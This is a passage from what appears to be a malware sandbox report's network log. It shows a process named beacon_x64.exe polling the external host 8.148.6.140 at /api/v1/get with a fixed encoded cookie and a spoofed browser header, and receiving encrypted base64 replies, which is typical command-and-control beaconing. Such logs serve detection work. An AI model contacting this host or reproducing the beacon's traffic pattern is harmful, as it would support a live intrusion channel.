          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:54.126885891 CET337INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:53 GMT
          Server: nginx
          Content-Length: 152
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 7a 75 4f 2b 43 54 66 5a 45 6b 37 58 73 74 58 57 78 65 53 43 71 49 32 4a 2f 36 55 73 30 4f 35 65 46 44 53 4d 68 73 6c 41 62 6d 63 35 63 56 75 76 6b 70 77 44 75 34 39 38 5a 6d 52 76 45 43 35 42 49 76 69 50 6b 68 38 48 72 55 36 53 75 6a 4f 77 39 2b 65 37 32 35 46 5a 4b 31 69 38 68 2f 64 36 30 49 51 52 6b 63 49 33 54 68 46 53 57 45 6d 31 71 70 46 63 39 4b 4c 48 6f 5a 31 4f 31 4c 4e 63 64 39 63 55 31 51 66 5a 6a 71 39 63 2f 56 57 52 77 34 76 7a 43 51 3d 3d
          Data Ascii: zuO+CTfZEk7XstXWxeSCqI2J/6Us0O5eFDSMhslAbmc5cVuvkpwDu498ZmRvEC5BIviPkh8HrU6SujOw9+e725FZK1i8h/d60IQRkcI3ThFSWEm1qpFc9KLHoZ1O1LNcd9cU1QfZjq9c/VWRw4vzCQ==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          97192.168.2.6500858.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:54.249459982 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          98192.168.2.6500868.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:55.233478069 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:56.215364933 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:56 GMT
          Server: nginx
          Content-Length: 320
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:27:56.215848923 CET320INData Raw: 36 71 65 5a 41 4e 48 4e 4b 6d 78 5a 32 34 30 61 68 38 53 4c 68 4c 6d 53 4d 78 76 43 35 4a 47 42 49 35 7a 51 35 48 42 4e 7a 6f 6c 48 72 54 57 6b 6c 75 70 34 64 72 7a 46 48 4a 47 45 4f 57 58 38 34 63 32 6f 66 63 53 79 67 72 73 77 51 6c 6c 5a 4e 38
          Data Ascii: 6qeZANHNKmxZ240ah8SLhLmSMxvC5JGBI5zQ5HBNzolHrTWklup4drzFHJGEOWX84c2ofcSygrswQllZN8V48+gRyZU8ws8AzV/cwRJ7wfCf+QtrYNSw3eypb8ndQPdmqDkpZ1r6bLBrtxlvbn9+hM+Fb7ipl8EsuqNUtPclyE1wsnj+hXbAaalmtizxIRcKYuPJV2p+nXGChiQJxUCldHs0vQ/BwD7Q9DTNhWBaF5N/kRrUTUe


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          99192.168.2.6500878.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:56.327219963 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:58.822376966 CET465INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:58 GMT
          Server: nginx
          Content-Length: 280
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 75 51 2b 30 53 4d 44 30 76 6b 43 38 31 62 44 43 44 68 4a 49 6b 6b 55 6e 33 2b 77 6d 58 51 2f 45 49 67 54 35 68 4e 71 33 77 6a 33 4e 74 63 35 4e 4e 66 77 58 6d 53 6c 47 65 58 66 78 4e 33 66 78 34 56 37 74 69 77 65 6b 50 52 7a 32 32 42 4d 51 71 38 47 76 4f 71 78 74 58 30 73 38 36 43 4d 42 78 72 68 6e 4e 4b 65 36 6a 31 70 59 33 46 70 6a 63 31 55 6b 56 78 4a 58 41 6a 49 45 65 35 5a 37 6b 2f 38 70 39 48 38 59 4d 49 36 70 54 54 69 59 39 4c 34 76 6d 43 30 78 32 71 58 73 71 4a 4a 35 4d 52 2b 6f 51 77 35 4c 36 57 42 49 54 62 61 64 51 65 79 30 4f 72 78 52 6b 5a 39 76 31 51 6d 6e 6d 42 48 74 5a 69 37 76 65 33 75 31 4f 45 6a 52 65 63 32 32 51 59 33 55 64 30 46 4f 61 4d 4d 69 53 71 45 44 56 34 59 4f 4e 74 72 57 46 4c 61 6c 48 47 64 38 4c 31 4f 47 64 42 6d 48 74 54 54 34 36 59 7a 45 37 6a 5a 75 42 38 46 71 76 34 54 57 75 67 6a 76 55 67 3d 3d
          Data Ascii: uQ+0SMD0vkC81bDCDhJIkkUn3+wmXQ/EIgT5hNq3wj3Ntc5NNfwXmSlGeXfxN3fx4V7tiwekPRz22BMQq8GvOqxtX0s86CMBxrhnNKe6j1pY3Fpjc1UkVxJXAjIEe5Z7k/8p9H8YMI6pTTiY9L4vmC0x2qXsqJJ5MR+oQw5L6WBITbadQey0OrxRkZ9v1QmnmBHtZi7ve3u1OEjRec22QY3Ud0FOaMMiSqEDV4YONtrWFLalHGd8L1OGdBmHtTT46YzE7jZuB8Fqv4TWugjvUg==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          100192.168.2.6500888.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:58.939017057 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          101192.168.2.6500898.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:59.977205992 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          102192.168.2.6500908.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:00.967505932 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:04.911849976 CET184INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:04 GMT
          Server: nginx
          Content-Length: 88
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:28:04.911871910 CET88INData Raw: 32 79 55 4f 59 4c 39 4e 65 56 71 56 38 6e 4a 31 59 44 5a 4c 2f 61 50 47 2f 50 2b 4c 4f 46 4b 55 77 49 68 36 66 6e 59 30 45 77 70 36 65 49 36 32 69 4e 78 4d 2f 2f 56 48 6b 56 37 41 69 68 46 31 66 34 6a 55 77 58 42 5a 77 61 75 38 6b 4e 6c 48 38 75
          Data Ascii: 2yUOYL9NeVqV8nJ1YDZL/aPG/P+LOFKUwIh6fnY0Ewp6eI62iNxM//VHkV7AihF1f4jUwXBZwau8kNlH8uVBsQ==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          103192.168.2.6500918.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:05.039238930 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:05.993217945 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:05 GMT
          Server: nginx
          Content-Length: 256
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:28:05.993228912 CET256INData Raw: 42 31 6e 67 76 30 55 64 49 37 6a 5a 65 77 44 2f 66 62 52 64 7a 7a 32 71 68 79 71 51 57 34 70 43 39 63 6f 6a 5a 74 6c 6f 59 41 7a 59 63 4b 31 30 7a 52 52 57 51 61 52 63 42 6b 64 75 4b 51 42 43 44 70 41 75 45 4a 56 63 30 62 37 33 70 4f 6d 78 36 72
          Data Ascii: B1ngv0UdI7jZewD/fbRdzz2qhyqQW4pC9cojZtloYAzYcK10zRRWQaRcBkduKQBCDpAuEJVc0b73pOmx6rH24LOq20NGMZvH1FPN7fGOQgl/Mq+XT30ihrveAt7D7p02Cfywk4G9yOxpMjlq8/ZJqx/6XyvgqcpptOtl/lq9gDMtlmu/RXm8aRtPKup5yTOSKoqmz2vhRVYR1rSkgRl2Pkkc2mBAM//LW3p9Ok3/R2C3A89ksll


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          104192.168.2.6500928.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:06.110570908 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:07.663578987 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:07 GMT
          Server: nginx
          Content-Length: 236
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:28:07.663634062 CET236INData Raw: 32 54 71 68 55 64 55 39 75 36 6c 71 66 53 67 74 45 53 55 49 55 58 4a 48 48 59 43 74 68 64 47 57 59 4f 52 77 5a 77 44 45 64 7a 70 54 52 34 2f 2f 62 52 35 62 42 71 46 6b 31 58 78 44 74 53 49 38 58 51 54 59 4d 55 47 67 54 31 38 6b 71 67 4f 4a 4c 4b
          Data Ascii: 2TqhUdU9u6lqfSgtESUIUXJHHYCthdGWYORwZwDEdzpTR4//bR5bBqFk1XxDtSI8XQTYMUGgT18kqgOJLKdD8gGpZDkAMI5I/jEz+YFFVnbJ2FqR/jO6rihezWO412ixRbcEy3J+VXNYH/OtrtEzaYPkPpQkz3QXE+WOkjSU6AwqbMz8yiYS4FWxJm+JhLTCoeO3KntUNiQdoEa8B1iDfUgJuycrGSYmA7zcgf/vgM8=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          105192.168.2.6500938.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:07.780637980 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          106192.168.2.6500948.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:08.798888922 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          107192.168.2.6500958.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:12.994018078 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          108192.168.2.6500968.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:14.015264034 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:14.994836092 CET337INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:14 GMT
          Server: nginx
          Content-Length: 152
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 55 44 57 67 71 65 6e 6a 61 59 50 66 52 67 6c 44 44 6f 75 79 4b 32 53 6c 70 4d 4a 36 71 73 57 71 57 56 65 4b 59 6c 6c 76 6d 31 2b 42 35 46 78 59 39 43 53 32 51 52 43 4c 31 45 77 53 76 49 48 6f 5a 34 32 36 4c 74 31 43 72 78 4c 64 75 34 2b 35 5a 67 76 45 42 6d 77 6a 45 4c 50 43 4e 63 41 2b 67 63 36 4b 6a 44 42 61 6e 6f 54 59 34 6c 66 4b 63 33 32 50 4e 75 63 41 34 48 70 68 51 72 6c 2f 77 6a 62 6a 37 56 58 2f 33 61 5a 65 6d 4b 4d 2b 52 31 36 35 34 41 3d 3d
          Data Ascii: UDWgqenjaYPfRglDDouyK2SlpMJ6qsWqWVeKYllvm1+B5FxY9CS2QRCL1EwSvIHoZ426Lt1CrxLdu4+5ZgvEBmwjELPCNcA+gc6KjDBanoTY4lfKc32PNucA4HphQrl/wjbj7VX/3aZemKM+R1654A==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          109192.168.2.6500978.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:15.108460903 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:19.111131907 CET505INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:18 GMT
          Server: nginx
          Content-Length: 320
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 55 69 76 49 42 70 4d 64 67 63 6c 4f 59 33 71 4d 4c 55 42 4c 74 48 2f 4d 63 43 6d 30 67 78 72 52 79 5a 69 67 58 66 35 37 42 57 33 65 2b 44 65 30 63 76 4c 68 41 44 6b 4c 52 6f 4e 45 79 2f 73 62 56 34 33 57 6e 38 49 79 70 73 36 71 30 72 79 76 63 6e 6e 6f 52 51 41 4c 47 46 70 52 48 59 6f 55 30 65 74 64 4a 37 58 37 68 58 47 32 54 73 6c 77 2b 66 5a 2f 52 41 6c 53 7a 72 38 52 66 61 68 2f 35 74 69 63 64 72 50 74 31 43 4a 61 2b 43 74 32 58 34 4d 58 31 6e 4c 57 6c 38 42 78 72 48 6f 48 36 63 66 75 75 53 7a 6d 63 43 46 68 4d 63 4a 31 41 78 4a 44 53 43 32 64 68 48 57 34 2f 42 6c 6a 4e 6e 6b 35 76 61 46 6a 65 70 56 35 53 56 68 37 56 53 79 33 47 48 56 79 6e 70 5a 50 4d 39 49 41 35 64 33 4b 71 55 55 52 36 36 30 2f 30 2f 79 67 76 75 71 49 33 44 78 71 2f 68 62 66 34 63 59 6b 53 2b 71 74 47 50 42 39 42 48 68 45 36 30 32 58 4e 63 75 62 4b 6a 49 45 63 62 6b 50 58 74 52 6b 6a 66 6f 49 48 2f 4b 41 68 66 74 56 38 58 67 71 71 4a 64 56 76 44 45 35 75 37 63 6d 34 5a 49 4f
          Data Ascii: UivIBpMdgclOY3qMLUBLtH/McCm0gxrRyZigXf57BW3e+De0cvLhADkLRoNEy/sbV43Wn8Iyps6q0ryvcnnoRQALGFpRHYoU0etdJ7X7hXG2Tslw+fZ/RAlSzr8Rfah/5ticdrPt1CJa+Ct2X4MX1nLWl8BxrHoH6cfuuSzmcCFhMcJ1AxJDSC2dhHW4/BljNnk5vaFjepV5SVh7VSy3GHVynpZPM9IA5d3KqUUR660/0/ygvuqI3Dxq/hbf4cYkS+qtGPB9BHhE602XNcubKjIEcbkPXtRkjfoIH/KAhftV8XgqqJdVvDE5u7cm4ZIO


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          110192.168.2.6500988.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:19.239536047 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          111192.168.2.6500998.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:20.218405962 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          112192.168.2.6501008.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:21.204240084 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:22.168569088 CET529INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:22 GMT
          Server: nginx
          Content-Length: 344
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 56 31 50 61 6f 34 39 6d 2f 53 57 56 50 35 7a 6f 57 56 79 48 45 4b 54 76 61 75 57 30 6a 4f 6b 37 34 75 49 4f 32 6a 43 6f 77 37 42 57 38 58 37 36 61 46 6e 38 61 4f 49 6a 76 48 36 67 46 72 67 51 4f 6f 41 73 34 34 37 43 71 66 39 74 41 63 68 4e 4c 5a 78 61 4c 4f 6d 2f 70 4a 34 58 35 55 65 65 55 7a 79 69 74 77 68 57 5a 59 54 6f 4d 32 4f 54 70 53 44 39 58 72 70 72 47 74 70 48 6a 47 76 67 4a 33 48 6e 45 47 5a 36 44 69 50 6d 6a 79 77 4d 45 4c 35 49 41 55 61 64 39 51 31 6d 34 36 45 58 38 5a 53 36 33 42 47 72 48 39 35 36 50 55 71 72 53 41 63 63 4c 73 74 37 33 6a 69 54 79 52 59 2b 35 38 70 6c 49 4a 61 31 54 39 61 6f 69 76 42 59 67 4e 78 61 62 39 34 47 42 4e 43 57 51 37 61 56 58 74 6c 38 41 2f 35 49 62 48 61 56 61 39 61 35 4c 63 51 43 53 76 55 44 7a 67 55 77 2f 48 44 48 64 4a 30 2f 37 6a 51 4f 73 35 46 4d 53 2b 75 71 70 74 6d 61 42 43 69 75 4f 55 41 4e 2b 32 68 72 